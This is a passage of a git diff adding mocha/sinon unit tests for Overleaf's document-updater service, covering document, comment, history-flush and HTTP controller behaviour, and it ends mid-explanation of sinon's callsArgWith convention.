+          this.DiffCodec.diffAsShareJsOp.returns(this.ops)
+          await this.DocumentManager.promises.setDoc(
+            this.project_id,
+            this.doc_id,
+            this.afterLines,
+            this.source,
+            this.user_id,
+            this.undoing,
+            false
+          )
+        })
+
+        it('should not add the external type to update metadata', function () {
+          this.UpdateManager.promises.applyUpdate
+            .calledWith(this.project_id, this.doc_id, {
+              doc: this.doc_id,
+              v: this.version,
+              op: this.ops,
+              meta: {
+                source: this.source,
+                user_id: this.user_id,
+              },
+            })
+            .should.equal(true)
+        })
+      })
+    })
+  })
+
+  describe('acceptChanges', function () {
+    beforeEach(function () {
+      this.change_id = 'mock-change-id'
+      this.change_ids = [
+        'mock-change-id-1',
+        'mock-change-id-2',
+        'mock-change-id-3',
+        'mock-change-id-4',
+      ]
+      this.version = 34
+      this.lines = ['original', 'lines']
+      this.ranges = { entries: 'mock', comments: 'mock' }
+      this.updated_ranges = { entries: 'updated', comments: 'updated' }
+      this.DocumentManager.promises.getDoc = sinon.stub().resolves({
+        lines: this.lines,
+        version: this.version,
+        ranges: this.ranges,
+      })
+      this.RangesManager.acceptChanges.returns(this.updated_ranges)
+    })
+
+    describe('successfully with a single change', function () {
+      beforeEach(async function () {
+        await this.DocumentManager.promises.acceptChanges(
+          this.project_id,
+          this.doc_id,
+          [this.change_id]
+        )
+      })
+
+      it("should get the document's current ranges", function () {
+        this.DocumentManager.promises.getDoc
+          .calledWith(this.project_id, this.doc_id)
+          .should.equal(true)
+      })
+
+      it('should apply the accept change to the ranges', function () {
+        this.RangesManager.acceptChanges.should.have.been.calledWith(
+          this.project_id,
+          this.doc_id,
+          [this.change_id],
+          this.ranges
+        )
+      })
+
+      it('should save the updated ranges', function () {
+        this.RedisManager.promises.updateDocument
+          .calledWith(
+            this.project_id,
+            this.doc_id,
+            this.lines,
+            this.version,
+            [],
+            this.updated_ranges,
+            {}
+          )
+          .should.equal(true)
+      })
+    })
+
+    describe('successfully with multiple changes', function () {
+      beforeEach(async function () {
+        await this.DocumentManager.promises.acceptChanges(
+          this.project_id,
+          this.doc_id,
+          this.change_ids
+        )
+      })
+
+      it('should apply the accept change to the ranges', function () {
+        this.RangesManager.acceptChanges
+          .calledWith(
+            this.project_id,
+            this.doc_id,
+            this.change_ids,
+            this.ranges
+          )
+          .should.equal(true)
+      })
+    })
+
+    describe('when the doc is not found', function () {
+      beforeEach(async function () {
+        this.DocumentManager.promises.getDoc = sinon
+          .stub()
+          .resolves({ lines: null, version: null, ranges: null })
+        await expect(
+          this.DocumentManager.promises.acceptChanges(
+            this.project_id,
+            this.doc_id,
+            [this.change_id]
+          )
+        ).to.be.rejectedWith(Errors.NotFoundError)
+      })
+
+      it('should not save anything', function () {
+        this.RedisManager.promises.updateDocument.called.should.equal(false)
+      })
+    })
+  })
+
+  describe('getComment', function () {
+    beforeEach(function () {
+      this.ranges.comments = [
+        {
+          id: 'mock-comment-id-1',
+        },
+        {
+          id: 'mock-comment-id-2',
+        },
+      ]
+      this.DocumentManager.promises.getDoc = sinon.stub().resolves({
+        lines: this.lines,
+        version: this.version,
+        ranges: this.ranges,
+      })
+    })
+
+    describe('when the comment exists', function () {
+      beforeEach(async function () {
+        await expect(
+          this.DocumentManager.promises.getComment(
+            this.project_id,
+            this.doc_id,
+            'mock-comment-id-1'
+          )
+        ).to.eventually.deep.equal({
+          comment: { id: 'mock-comment-id-1' },
+        })
+      })
+
+      it("should get the document's current ranges", function () {
+        this.DocumentManager.promises.getDoc
+          .calledWith(this.project_id, this.doc_id)
+          .should.equal(true)
+      })
+    })
+
+    describe("when the comment doesn't exist", function () {
+      beforeEach(async function () {
+        await expect(
+          this.DocumentManager.promises.getComment(
+            this.project_id,
+            this.doc_id,
+            'mock-comment-id-x'
+          )
+        ).to.be.rejectedWith(Errors.NotFoundError)
+      })
+
+      it("should get the document's current ranges", function () {
+        this.DocumentManager.promises.getDoc
+          .calledWith(this.project_id, this.doc_id)
+          .should.equal(true)
+      })
+    })
+
+    describe('when the doc is not found', function () {
+      beforeEach(async function () {
+        this.DocumentManager.promises.getDoc = sinon
+          .stub()
+          .resolves({ lines: null, version: null, ranges: null })
+        await expect(
+          this.DocumentManager.promises.getComment(
+            this.project_id,
+            this.doc_id,
+            'mock-comment-id-1'
+          )
+        ).to.be.rejectedWith(Errors.NotFoundError)
+      })
+    })
+  })
+
+  describe('deleteComment', function () {
+    beforeEach(function () {
+      this.comment_id = 'mock-comment-id'
+      this.version = 34
+      this.lines = ['original', 'lines']
+      this.ranges = { comments: ['one', 'two', 'three'] }
+      this.resolvedCommentIds = ['comment1']
+      this.updated_ranges = { comments: ['one', 'three'] }
+      this.historyRangesSupport = true
+      this.DocumentManager.promises.getDoc = sinon.stub().resolves({
+        lines: this.lines,
+        version: this.version,
+        ranges: this.ranges,
+        resolvedCommentIds: this.resolvedCommentIds,
+        pathname: this.pathname,
+        projectHistoryId: this.projectHistoryId,
+        unflushedTime: Date.now() - 1e9,
+        alreadyLoaded: true,
+        historyRangesSupport: this.historyRangesSupport,
+      })
+      this.RangesManager.deleteComment.returns(this.updated_ranges)
+    })
+
+    describe('successfully', function () {
+      beforeEach(async function () {
+        await this.DocumentManager.promises.deleteComment(
+          this.project_id,
+          this.doc_id,
+          this.comment_id,
+          this.user_id
+        )
+      })
+
+      it("should get the document's current ranges", function () {
+        this.DocumentManager.promises.getDoc
+          .calledWith(this.project_id, this.doc_id)
+          .should.equal(true)
+      })
+
+      it('should delete the comment from the ranges', function () {
+        this.RangesManager.deleteComment
+          .calledWith(this.comment_id, this.ranges)
+          .should.equal(true)
+      })
+
+      it('should save the updated ranges', function () {
+        this.RedisManager.promises.updateDocument
+          .calledWith(
+            this.project_id,
+            this.doc_id,
+            this.lines,
+            this.version,
+            [],
+            this.updated_ranges,
+            {}
+          )
+          .should.equal(true)
+      })
+
+      it('should unset the comment resolved state', function () {
+        this.RedisManager.promises.updateCommentState.should.have.been.calledWith(
+          this.doc_id,
+          this.comment_id,
+          false
+        )
+      })
+
+      it('should queue the delete comment operation', function () {
+        this.ProjectHistoryRedisManager.promises.queueOps.should.have.been.calledWith(
+          this.project_id,
+          JSON.stringify({
+            pathname: this.pathname,
+            deleteComment: this.comment_id,
+            meta: {
+              ts: new Date(),
+              user_id: this.user_id,
+            },
+          })
+        )
+      })
+    })
+
+    describe('when the doc is not found', function () {
+      beforeEach(async function () {
+        this.DocumentManager.promises.getDoc = sinon
+          .stub()
+          .resolves({ lines: null, version: null, ranges: null })
+        await expect(
+          this.DocumentManager.promises.deleteComment(
+            this.project_id,
+            this.doc_id,
+            this.comment_id,
+            this.user_id
+          )
+        ).to.be.rejectedWith(Errors.NotFoundError)
+      })
+
+      it('should not save anything', function () {
+        this.RedisManager.promises.updateDocument.called.should.equal(false)
+      })
+    })
+  })
+
+  describe('getDocAndFlushIfOld', function () {
+    beforeEach(function () {
+      this.DocumentManager.promises.flushDocIfLoaded = sinon.stub().resolves()
+    })
+
+    describe('when the doc is in Redis', function () {
+      describe('and has changes to be flushed', function () {
+        beforeEach(async function () {
+          this.DocumentManager.promises.getDoc = sinon.stub().resolves({
+            lines: this.lines,
+            version: this.version,
+            ranges: this.ranges,
+            projectHistoryId: this.projectHistoryId,
+            pathname: this.pathname,
+            unflushedTime: Date.now() - 1e9,
+            alreadyLoaded: true,
+          })
+          this.result = await this.DocumentManager.promises.getDocAndFlushIfOld(
+            this.project_id,
+            this.doc_id
+          )
+        })
+
+        it('should get the doc', function () {
+          this.DocumentManager.promises.getDoc
.calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should flush the doc', function () { + this.DocumentManager.promises.flushDocIfLoaded + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return the lines and versions', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + }) + }) + }) + + describe("and has only changes that don't need to be flushed", function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + unflushedTime: Date.now() - 100, + alreadyLoaded: true, + }) + this.result = await this.DocumentManager.promises.getDocAndFlushIfOld( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not flush the doc', function () { + this.DocumentManager.promises.flushDocIfLoaded.called.should.equal( + false + ) + }) + + it('should return the lines and versions', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + }) + }) + }) + }) + + describe('when the doc is not in Redis', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + alreadyLoaded: false, + }) + this.result = await this.DocumentManager.promises.getDocAndFlushIfOld( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not flush the doc', function () { + this.DocumentManager.promises.flushDocIfLoaded.called.should.equal( + false + ) + }) + + it('should return the lines and versions', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + }) + }) + }) + }) + + describe('renameDoc', function () { + beforeEach(function () { + this.update = 'some-update' + }) + + describe('successfully', function () { + beforeEach(async function () { + await this.DocumentManager.promises.renameDoc( + this.project_id, + this.doc_id, + this.user_id, + this.update, + this.projectHistoryId + ) + }) + + it('should rename the document', function () { + this.RedisManager.promises.renameDoc + .calledWith( + this.project_id, + this.doc_id, + this.user_id, + this.update, + this.projectHistoryId + ) + .should.equal(true) + }) + }) + }) + + describe('resyncDocContents', function () { + describe('when doc is loaded in redis', function () { + beforeEach(async function () { + this.pathnameFromProjectStructureUpdate = '/foo/bar.tex' + this.RedisManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: this.historyRangesSupport, + }) + await this.DocumentManager.promises.resyncDocContents( + this.project_id, + this.doc_id, + this.pathnameFromProjectStructureUpdate + ) + }) + + it('gets the doc contents from redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('queues a resync doc content update', function () { + 
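+        // note: the queued op must carry the pathname from the project
+        // structure update, not the pathname stored with the doc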
+        this.ProjectHistoryRedisManager.promises.queueResyncDocContent
+          .calledWith(
+            this.project_id,
+            this.projectHistoryId,
+            this.doc_id,
+            this.lines,
+            this.ranges,
+            this.resolvedCommentIds,
+            this.version,
+            this.pathnameFromProjectStructureUpdate,
+            this.historyRangesSupport
+          )
+          .should.equal(true)
+      })
+    })
+
+    describe('when doc is not loaded in redis', function () {
+      beforeEach(async function () {
+        this.pathnameFromProjectStructureUpdate = '/foo/bar.tex'
+        this.RedisManager.promises.getDoc.resolves({})
+        this.PersistenceManager.promises.getDoc.resolves({
+          lines: this.lines,
+          version: this.version,
+          ranges: this.ranges,
+          resolvedCommentIds: this.resolvedCommentIds,
+          pathname: this.pathname,
+          projectHistoryId: this.projectHistoryId,
+          historyRangesSupport: this.historyRangesSupport,
+        })
+        await this.DocumentManager.promises.resyncDocContents(
+          this.project_id,
+          this.doc_id,
+          this.pathnameFromProjectStructureUpdate
+        )
+      })
+
+      it('tries to get the doc contents from redis', function () {
+        this.RedisManager.promises.getDoc
+          .calledWith(this.project_id, this.doc_id)
+          .should.equal(true)
+      })
+
+      it('gets the doc contents from web', function () {
+        this.PersistenceManager.promises.getDoc
+          .calledWith(this.project_id, this.doc_id, { peek: true })
+          .should.equal(true)
+      })
+
+      it('queues a resync doc content update', function () {
+        this.ProjectHistoryRedisManager.promises.queueResyncDocContent
+          .calledWith(
+            this.project_id,
+            this.projectHistoryId,
+            this.doc_id,
+            this.lines,
+            this.ranges,
+            this.resolvedCommentIds,
+            this.version,
+            this.pathnameFromProjectStructureUpdate,
+            this.historyRangesSupport
+          )
+          .should.equal(true)
+      })
+    })
+
+    describe('when a doc has no ranges in docstore', function () {
+      beforeEach(async function () {
+        this.pathnameFromProjectStructureUpdate = '/foo/bar.tex'
+        this.RedisManager.promises.getDoc.resolves({})
+        this.PersistenceManager.promises.getDoc.resolves({
+          lines: this.lines,
+          version: this.version,
+          ranges: undefined,
+          resolvedCommentIds: [],
+          pathname: this.pathname,
+          projectHistoryId: this.projectHistoryId,
+          historyRangesSupport: this.historyRangesSupport,
+        })
+        await this.DocumentManager.promises.resyncDocContents(
+          this.project_id,
+          this.doc_id,
+          this.pathnameFromProjectStructureUpdate
+        )
+      })
+
+      it('gets the doc contents from web', function () {
+        this.PersistenceManager.promises.getDoc
+          .calledWith(this.project_id, this.doc_id, { peek: true })
+          .should.equal(true)
+      })
+
+      it('queues a resync doc content update with an empty ranges object', function () {
+        this.ProjectHistoryRedisManager.promises.queueResyncDocContent
+          .calledWith(
+            this.project_id,
+            this.projectHistoryId,
+            this.doc_id,
+            this.lines,
+            {},
+            [],
+            this.version,
+            this.pathnameFromProjectStructureUpdate,
+            this.historyRangesSupport
+          )
+          .should.equal(true)
+      })
+    })
+  })
+
+  describe('appendToDoc', function () {
+    describe('successfully', function () {
+      beforeEach(async function () {
+        this.lines = ['one', 'two', 'three']
+        this.DocumentManager.promises.setDoc = sinon
+          .stub()
+          .resolves({ rev: '123' })
+        this.DocumentManager.promises.getDoc = sinon.stub().resolves({
+          lines: this.lines,
+        })
+        this.result = await this.DocumentManager.promises.appendToDoc(
+          this.project_id,
+          this.doc_id,
+          ['four', 'five', 'six'],
+          this.source,
+          this.user_id
+        )
+      })
+
+      it('should call setDoc with concatenated lines', function () {
+        this.DocumentManager.promises.setDoc
+          .calledWith(
+            this.project_id,
+            this.doc_id,
+            ['one', 'two', 'three', 'four', 'five', 'six'],
+            this.source,
+            this.user_id,
+            false,
+            false
+          )
+          .should.equal(true)
+      })
+
+      it('should return output from setDoc', function () {
+        this.result.should.deep.equal({ rev: '123' })
+      })
+    })
+
+    describe('when doc would become too big', function () {
+      beforeEach(async function () {
+        this.Settings.max_doc_length = 100
+        this.lines = ['one', 'two', 'three']
+        this.DocumentManager.promises.setDoc = sinon
+          .stub()
+          .resolves({ rev: '123' })
+        this.DocumentManager.promises.getDoc = sinon.stub().resolves({
+          lines: this.lines,
+        })
+      })
+
+      it('should fail with FileTooLarge error', async function () {
+        await expect(
+          this.DocumentManager.promises.appendToDoc(
+            this.project_id,
+            this.doc_id,
+            ['x'.repeat(1000)],
+            this.source,
+            this.user_id
+          )
+        ).to.eventually.be.rejectedWith(Errors.FileTooLargeError)
+      })
+    })
+  })
+})
diff --git a/services/document-updater/test/unit/js/HistoryConversionsTests.js b/services/document-updater/test/unit/js/HistoryConversionsTests.js
new file mode 100644
index 0000000..2bd18c3
--- /dev/null
+++ b/services/document-updater/test/unit/js/HistoryConversionsTests.js
@@ -0,0 +1,117 @@
+const _ = require('lodash')
+const { expect } = require('chai')
+const HistoryConversions = require('../../../app/js/HistoryConversions')
+
+describe('HistoryConversions', function () {
+  describe('toHistoryRanges', function () {
+    it('handles empty ranges', function () {
+      expect(HistoryConversions.toHistoryRanges({})).to.deep.equal({})
+    })
+
+    it("doesn't modify comments when there are no tracked changes", function () {
+      const ranges = {
+        comments: [makeComment('comment1', 5, 12)],
+      }
+      const historyRanges = HistoryConversions.toHistoryRanges(ranges)
+      expect(historyRanges).to.deep.equal(ranges)
+    })
+
+    it('adjusts comments and tracked changes to account for tracked deletes', function () {
+      const comments = [
+        makeComment('comment0', 0, 1),
+        makeComment('comment1', 10, 12),
+        makeComment('comment2', 20, 10),
+        makeComment('comment3', 15, 3),
+      ]
+      const changes = [
+        makeTrackedDelete('change0', 2, 5),
+        makeTrackedInsert('change1', 4, 5),
+        makeTrackedDelete('change2', 10, 10),
+        makeTrackedDelete('change3', 21, 6),
+        makeTrackedDelete('change4', 50, 7),
+      ]
+      const ranges = { comments, changes }
+
+      const historyRanges = HistoryConversions.toHistoryRanges(ranges)
+      expect(historyRanges.comments).to.have.deep.members([
+        comments[0],
+        // shifted by change0 and change2, extended by change3
+        enrichOp(comments[1], {
+          hpos: 25, // 10 + 5 + 10
+          hlen: 18, // 12 + 6
+        }),
+        // shifted by change0 and change2, extended by change3
+        enrichOp(comments[2], {
+          hpos: 35, // 20 + 5 + 10
+          hlen: 16, // 10 + 6
+        }),
+        // shifted by change0 and change2
+        enrichOp(comments[3], {
+          hpos: 30, // 15 + 5 + 10
+        }),
+      ])
+      expect(historyRanges.changes).to.deep.equal([
+        changes[0],
+        enrichOp(changes[1], {
+          hpos: 9, // 4 + 5
+        }),
+        enrichOp(changes[2], {
+          hpos: 15, // 10 + 5
+        }),
+        enrichOp(changes[3], {
+          hpos: 36, // 21 + 5 + 10
+        }),
+        enrichOp(changes[4], {
+          hpos: 71, // 50 + 5 + 10 + 6
+        }),
+      ])
+    })
+  })
+})
+
+function makeComment(id, pos, length) {
+  return {
+    id,
+    op: {
+      c: 'c'.repeat(length),
+      p: pos,
+      t: id,
+    },
+    metadata: makeMetadata(),
+  }
+}
+
+function makeTrackedInsert(id, pos, length) {
+  return {
+    id,
+    op: {
+      i: 'i'.repeat(length),
+      p: pos,
+    },
+    metadata: makeMetadata(),
+  }
+}
+
+function makeTrackedDelete(id, pos, length) {
+  return {
+    id,
+    op: {
+      d: 'd'.repeat(length),
+      p: pos,
+    },
+    metadata: makeMetadata(),
+  }
+}
+
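+// Test fixtures: build comment and tracked-change entries in the
+// { id, op, metadata } shape used by the ranges. The hpos/hlen values
+// asserted above are history coordinates, i.e. positions and lengths that
+// also count text hidden by tracked deletes.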
+function makeMetadata() { + return { + user_id: 'user-id', + ts: new Date().toISOString(), + } +} + +function enrichOp(commentOrChange, extraFields) { + const result = _.cloneDeep(commentOrChange) + Object.assign(result.op, extraFields) + return result +} diff --git a/services/document-updater/test/unit/js/HistoryManager/HistoryManagerTests.js b/services/document-updater/test/unit/js/HistoryManager/HistoryManagerTests.js new file mode 100644 index 0000000..2fd019d --- /dev/null +++ b/services/document-updater/test/unit/js/HistoryManager/HistoryManagerTests.js @@ -0,0 +1,291 @@ +/* eslint-disable + mocha/no-nested-tests, +*/ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../../app/js/HistoryManager' +) + +describe('HistoryManager', function () { + beforeEach(function () { + this.HistoryManager = SandboxedModule.require(modulePath, { + requires: { + request: (this.request = {}), + '@overleaf/settings': (this.Settings = { + apis: { + project_history: { + url: 'http://project_history.example.com', + }, + }, + }), + './DocumentManager': (this.DocumentManager = {}), + './RedisManager': (this.RedisManager = {}), + './ProjectHistoryRedisManager': (this.ProjectHistoryRedisManager = {}), + './Metrics': (this.metrics = { inc: sinon.stub() }), + }, + }) + this.project_id = 'mock-project-id' + this.callback = sinon.stub() + }) + + describe('flushProjectChangesAsync', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 204 }) + + this.HistoryManager.flushProjectChangesAsync(this.project_id) + }) + + it('should send a request to the project history api', function () { + this.request.post + .calledWith({ + url: `${this.Settings.apis.project_history.url}/project/${this.project_id}/flush`, + qs: { background: true }, + }) + .should.equal(true) + }) + }) + + describe('flushProjectChanges', function () { + describe('in the normal case', function () { + beforeEach(function (done) { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 204 }) + this.HistoryManager.flushProjectChanges( + this.project_id, + { + background: true, + }, + done + ) + }) + + it('should send a request to the project history api', function () { + this.request.post + .calledWith({ + url: `${this.Settings.apis.project_history.url}/project/${this.project_id}/flush`, + qs: { background: true }, + }) + .should.equal(true) + }) + }) + + describe('with the skip_history_flush option', function () { + beforeEach(function (done) { + this.request.post = sinon.stub() + this.HistoryManager.flushProjectChanges( + this.project_id, + { + skip_history_flush: true, + }, + done + ) + }) + + it('should not send a request to the project history api', function () { + this.request.post.called.should.equal(false) + }) + }) + }) + + describe('recordAndFlushHistoryOps', function () { + beforeEach(function () { + this.ops = ['mock-ops'] + this.project_ops_length = 10 + + this.HistoryManager.flushProjectChangesAsync = sinon.stub() + }) + + describe('with no ops', function () { + beforeEach(function () { + this.HistoryManager.recordAndFlushHistoryOps( + this.project_id, + [], + this.project_ops_length + ) + }) + + it('should not flush project changes', function () { + this.HistoryManager.flushProjectChangesAsync.called.should.equal(false) + }) + }) + + describe('with enough ops to flush project changes', function () { + beforeEach(function () { + 
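+        // make the threshold check report that a project flush is due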
this.HistoryManager.shouldFlushHistoryOps = sinon.stub() + this.HistoryManager.shouldFlushHistoryOps + .withArgs(this.project_ops_length) + .returns(true) + + this.HistoryManager.recordAndFlushHistoryOps( + this.project_id, + this.ops, + this.project_ops_length + ) + }) + + it('should flush project changes', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('with enough ops to flush doc changes', function () { + beforeEach(function () { + this.HistoryManager.shouldFlushHistoryOps = sinon.stub() + this.HistoryManager.shouldFlushHistoryOps + .withArgs(this.project_ops_length) + .returns(false) + + this.HistoryManager.recordAndFlushHistoryOps( + this.project_id, + this.ops, + this.project_ops_length + ) + }) + + it('should not flush project changes', function () { + this.HistoryManager.flushProjectChangesAsync.called.should.equal(false) + }) + }) + + describe('shouldFlushHistoryOps', function () { + it('should return false if the number of ops is not known', function () { + this.HistoryManager.shouldFlushHistoryOps( + null, + ['a', 'b', 'c'].length, + 1 + ).should.equal(false) + }) + + it("should return false if the updates didn't take us past the threshold", function () { + // Currently there are 14 ops + // Previously we were on 11 ops + // We didn't pass over a multiple of 5 + this.HistoryManager.shouldFlushHistoryOps( + 14, + ['a', 'b', 'c'].length, + 5 + ).should.equal(false) + }) + + it('should return true if the updates took us to the threshold', function () { + // Currently there are 15 ops + // Previously we were on 12 ops + // We've reached a new multiple of 5 + this.HistoryManager.shouldFlushHistoryOps( + 15, + ['a', 'b', 'c'].length, + 5 + ).should.equal(true) + }) + + it('should return true if the updates took us past the threshold', function () { + // Currently there are 17 ops + // Previously we were on 14 ops + // We've passed over a multiple of 5 (15) + this.HistoryManager.shouldFlushHistoryOps( + 17, + ['a', 'b', 'c'].length, + 5 + ).should.equal(true) + }) + }) + }) + + describe('resyncProjectHistory', function () { + beforeEach(function () { + this.projectHistoryId = 'history-id-1234' + this.docs = [ + { + doc: this.doc_id, + path: 'main.tex', + }, + ] + this.files = [ + { + file: 'mock-file-id', + path: 'universe.png', + url: `www.filestore.test/${this.project_id}/mock-file-id`, + }, + ] + this.ProjectHistoryRedisManager.queueResyncProjectStructure = sinon + .stub() + .yields() + this.DocumentManager.resyncDocContentsWithLock = sinon.stub().yields() + }) + + describe('full sync', function () { + beforeEach(function () { + this.HistoryManager.resyncProjectHistory( + this.project_id, + this.projectHistoryId, + this.docs, + this.files, + {}, + this.callback + ) + }) + + it('should queue a project structure resync', function () { + this.ProjectHistoryRedisManager.queueResyncProjectStructure + .calledWith( + this.project_id, + this.projectHistoryId, + this.docs, + this.files + ) + .should.equal(true) + }) + + it('should queue doc content resyncs', function () { + this.DocumentManager.resyncDocContentsWithLock + .calledWith(this.project_id, this.docs[0].doc, this.docs[0].path) + .should.equal(true) + }) + + it('should call the callback', function () { + this.callback.called.should.equal(true) + }) + }) + + describe('resyncProjectStructureOnly=true', function () { + beforeEach(function () { + this.HistoryManager.resyncProjectHistory( + this.project_id, + this.projectHistoryId, + this.docs, + this.files, + {
resyncProjectStructureOnly: true }, + this.callback + ) + }) + + it('should queue a project structure resync', function () { + this.ProjectHistoryRedisManager.queueResyncProjectStructure + .calledWith( + this.project_id, + this.projectHistoryId, + this.docs, + this.files, + { resyncProjectStructureOnly: true } + ) + .should.equal(true) + }) + + it('should not queue doc content resyncs', function () { + this.DocumentManager.resyncDocContentsWithLock.called.should.equal( + false + ) + }) + + it('should call the callback', function () { + this.callback.called.should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/HttpController/HttpControllerTests.js b/services/document-updater/test/unit/js/HttpController/HttpControllerTests.js new file mode 100644 index 0000000..2b8d288 --- /dev/null +++ b/services/document-updater/test/unit/js/HttpController/HttpControllerTests.js @@ -0,0 +1,1258 @@ +const sinon = require('sinon') +const modulePath = '../../../../app/js/HttpController.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors.js') + +describe('HttpController', function () { + beforeEach(function () { + this.HttpController = SandboxedModule.require(modulePath, { + requires: { + './DocumentManager': (this.DocumentManager = {}), + './HistoryManager': (this.HistoryManager = { + flushProjectChangesAsync: sinon.stub(), + }), + './ProjectHistoryRedisManager': (this.ProjectHistoryRedisManager = {}), + './ProjectManager': (this.ProjectManager = {}), + './DeleteQueueManager': (this.DeleteQueueManager = {}), + './RedisManager': (this.RedisManager = { + DOC_OPS_TTL: 42, + }), + './Metrics': (this.Metrics = {}), + './Errors': Errors, + '@overleaf/settings': { max_doc_length: 2 * 1024 * 1024 }, + }, + }) + this.Metrics.Timer = class Timer {} + this.Metrics.Timer.prototype.done = sinon.stub() + + this.project_id = 'project-id-123' + this.doc_id = 'doc-id-123' + this.source = 'editor' + this.next = sinon.stub() + this.res = { + send: sinon.stub(), + sendStatus: sinon.stub(), + json: sinon.stub(), + } + }) + + describe('getDoc', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three'] + this.ops = ['mock-op-1', 'mock-op-2'] + this.version = 42 + this.fromVersion = 42 + this.ranges = { changes: 'mock', comments: 'mock' } + this.pathname = '/a/b/c' + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + }, + query: {}, + body: {}, + } + }) + + describe('when the document exists and no recent ops are requested', function () { + beforeEach(function () { + this.DocumentManager.getDocAndRecentOpsWithLock = sinon + .stub() + .callsArgWith( + 3, + null, + this.lines, + this.version, + [], + this.ranges, + this.pathname + ) + this.HttpController.getDoc(this.req, this.res, this.next) + }) + + it('should get the doc', function () { + this.DocumentManager.getDocAndRecentOpsWithLock + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should return the doc as JSON', function () { + this.res.json + .calledWith({ + id: this.doc_id, + lines: this.lines, + version: this.version, + ops: [], + ranges: this.ranges, + pathname: this.pathname, + ttlInS: 42, + }) + .should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { docId: this.doc_id, projectId: this.project_id }, + 'getting doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () {
this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when recent ops are requested', function () { + beforeEach(function () { + this.DocumentManager.getDocAndRecentOpsWithLock = sinon + .stub() + .callsArgWith( + 3, + null, + this.lines, + this.version, + this.ops, + this.ranges, + this.pathname + ) + this.req.query = { fromVersion: `${this.fromVersion}` } + this.HttpController.getDoc(this.req, this.res, this.next) + }) + + it('should get the doc', function () { + this.DocumentManager.getDocAndRecentOpsWithLock + .calledWith(this.project_id, this.doc_id, this.fromVersion) + .should.equal(true) + }) + + it('should return the doc as JSON', function () { + this.res.json + .calledWith({ + id: this.doc_id, + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + pathname: this.pathname, + ttlInS: 42, + }) + .should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { docId: this.doc_id, projectId: this.project_id }, + 'getting doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when the document does not exist', function () { + beforeEach(function () { + this.DocumentManager.getDocAndRecentOpsWithLock = sinon + .stub() + .callsArgWith(3, null, null, null) + this.HttpController.getDoc(this.req, this.res, this.next) + }) + + it('should call next with NotFoundError', function () { + this.next + .calledWith(sinon.match.instanceOf(Errors.NotFoundError)) + .should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.getDocAndRecentOpsWithLock = sinon + .stub() + .callsArgWith(3, new Error('oops'), null, null) + this.HttpController.getDoc(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('getComment', function () { + beforeEach(function () { + this.ranges = { + changes: 'mock', + comments: [ + { + id: 'comment-id-1', + }, + { + id: 'comment-id-2', + }, + ], + } + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + comment_id: this.comment_id, + }, + query: {}, + body: {}, + } + }) + + beforeEach(function () { + this.DocumentManager.getCommentWithLock = sinon + .stub() + .callsArgWith(3, null, this.ranges.comments[0]) + this.HttpController.getComment(this.req, this.res, this.next) + }) + + it('should get the comment', function () { + this.DocumentManager.getCommentWithLock + .calledWith(this.project_id, this.doc_id, this.comment_id) + .should.equal(true) + }) + + it('should return the comment as JSON', function () { + this.res.json + .calledWith({ + id: 'comment-id-1', + }) + .should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + projectId: this.project_id, + docId: this.doc_id, + commentId: this.comment_id, + }, + 'getting comment via http' + ) + .should.equal(true) + }) + }) + + describe('setDoc', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three'] + this.source = 'dropbox' + this.user_id = 'user-id-123' + this.req = { + headers: {}, + params: { + project_id: this.project_id, + doc_id: this.doc_id, + }, + query: {}, + body: { + lines: this.lines, + source: this.source, + user_id: this.user_id, + undoing: (this.undoing = true), + }, + } + }) + 
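A note on the stubbing convention used throughout this file: sinon's callsArgWith(n, ...args) makes a stub invoke its n-th (zero-indexed) argument as a callback with the given arguments. So callsArgWith(7, null, { rev: '123' }) models a setDocWithLock whose eighth positional argument is a Node-style callback. A small self-contained sketch of the mechanism (the argument names are illustrative assumptions, not the real signature):

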